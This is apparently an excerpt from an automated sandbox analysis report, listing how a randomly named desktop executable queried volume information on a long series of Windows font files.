Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
